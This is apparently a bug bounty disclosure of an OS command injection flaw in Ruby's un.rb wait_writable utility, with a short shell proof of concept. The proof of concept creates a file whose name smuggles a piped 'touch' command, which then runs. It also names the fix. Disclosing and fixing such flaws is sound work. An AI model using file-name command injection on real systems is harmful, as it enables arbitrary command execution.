OS Command Injection in '/lib/un.rb -- Utilities to replace common UNIX commands in Makefiles etc'

If the `wait_writable` command receives a list of files with a command in the name of one of them, it will be executed. # PoC ```bash $ touch \|\ touch\ evil.txt $ ls '| touch evil.txt' $ ruby -run -e wait_writable -- -w 1 -v * $ ls evil.txt '| touch evil.txt' ``` The vulnerability has the same severity as https://hackerone.com/reports/651518 . The fix, respectively, is the same: `open` -> `File.open`. ## Impact An attacker can use this problem to execute arbitrary commands in environments that uses ruby coreutilities.